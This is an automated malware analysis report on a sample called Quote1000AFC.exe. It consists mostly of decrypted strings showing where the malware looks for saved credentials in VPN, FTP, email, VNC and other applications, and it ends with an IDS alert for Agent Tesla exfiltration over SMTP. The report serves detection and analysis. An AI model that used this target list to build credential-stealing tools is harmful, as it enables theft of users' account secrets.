                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: name
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Psi/Psi+
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: APPDATA
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Psi\profiles
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: APPDATA
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \accounts.xml
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \accounts.xml
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: OpenVPN
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: username
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: auth-data
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: entropy
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: USERPROFILE
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: remote
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: remote
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: NordVPN
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: NordVPN
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: user.config
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: NordVPN
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Private Internet Access
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \account.json
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Private Internet Access
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: FileZilla
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: APPDATA
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: APPDATA
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <Server>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <Host>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <Host>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </Host>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <Port>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </Port>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <User>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <User>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </User>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </Pass>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <Pass>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </Pass>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: CoreFTP
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: User
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Host
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Port
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: WinSCP
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: HostName
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UserName
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: PublicKeyFile
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: PortNumber
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: WinSCP
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ABCDEF
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Flash FXP
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: port
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: user
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: pass
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: quick.dat
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Sites.dat
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \FlashFXP\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \FlashFXP\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: FTP Navigator
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SystemDrive
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Server
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: No Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: User
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SmartFTP
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: APPDATA
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: WS_FTP
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: appdata
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: HOST
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: PWD=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: PWD=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: FtpCommander
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SystemDrive
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SystemDrive
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SystemDrive
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ;Password=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ;User=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ;Server=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ;Port=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ;Port=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ;Password=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ;User=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ;Anonymous=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: FTPGetter
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <server>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <server_ip>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <server_ip>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </server_ip>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <server_port>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </server_port>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <server_user_name>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <server_user_name>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </server_user_name>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <server_user_password>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <server_user_password>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </server_user_password>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: FTPGetter
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: The Bat!
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: appdata
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \The Bat!
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Account.CFN
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Account.CFN
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Becky!
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: DataDir
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Folder.lst
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Account
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: PassWd
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Account
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SMTPServer
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Account
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: MailAddress
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Becky!
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Outlook
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Email
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: IMAP Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: POP3 Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: HTTP Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SMTP Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Email
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Email
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Email
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: IMAP Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: POP3 Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: HTTP Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SMTP Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Server
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Windows Mail App
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Email
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Server
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SchemaId
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: pResourceElement
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: pIdentityElement
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: pPackageSid
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: syncpassword
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: mailoutgoing
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: FoxMail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Executable
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: FoxmailPath
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Storage\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Storage\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \mail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \mail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Account.stg
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Account.stg
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: POP3Host
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SMTPHost
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: IncomingServer
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Account
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: MailAddress
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: POP3Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Opera Mail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: opera:
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: PocoMail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: appdata
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Email
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: POPPass
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SMTPPass
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SMTP
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: eM Client
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: eM Client\accounts.dat
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: eM Client
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Accounts
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: "Username":"
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: "Secret":"
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: "ProviderName":"
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: o6806642kbM7c5
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Mailbird
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SenderIdentities
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Accounts
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Server_Host
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Accounts
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Email
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Username
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: EncryptedPassword
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Mailbird
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: TightVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: TightVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: PasswordViewOnly
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: TightVNC ControlPassword
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ControlPassword
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: TigerVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\TigerVNC\Server
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: passwd
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: passwd2
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ProgramFiles
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: passwd
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ProgramFiles
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: passwd2
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ProgramFiles
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: passwd
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ProgramFiles
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: passwd2
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: passwd
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: passwd2
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: JDownloader 2.0
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Paltalk
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: nickname
                        Source: Quote1000AFC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Quote1000AFC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.8:49708 -> 199.79.62.115:587
